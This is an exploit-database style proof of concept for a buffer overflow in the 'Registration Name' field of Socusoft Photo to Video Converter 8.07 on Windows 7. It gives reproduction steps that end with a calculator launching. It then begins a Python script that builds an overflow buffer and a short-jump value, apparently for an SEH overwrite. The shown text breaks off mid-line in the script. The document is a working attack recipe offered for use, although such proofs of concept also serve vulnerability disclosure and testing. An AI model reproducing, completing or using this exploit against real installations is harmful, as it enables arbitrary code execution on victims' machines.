# Exploit Title: Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow # Exploit Author : ZwX # Exploit Date: 2018-09-13 # Vendor Homepage : http://www.dvd-photo-slideshow.com/photo-to-video-converter.html # Version Software : 8.07 # Tested on OS: Windows 7 # Related Exploit Link : https://www.exploit-db.com/exploits/45353/ ''' Steps to Reproduce: =================== 1.Download and install Photo to Video Converter Professional 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "" then go to Menu -> Help -> Save 4.Paste the contents of the file (poc.txt) into the input "Registration Name" and click "Activate" 5.Now the calculator executes! ''' #!/usr/bin/python from struct import pack buffer = "\x41" * 256 a = "\xeb\x06\xff\xff" b = pack("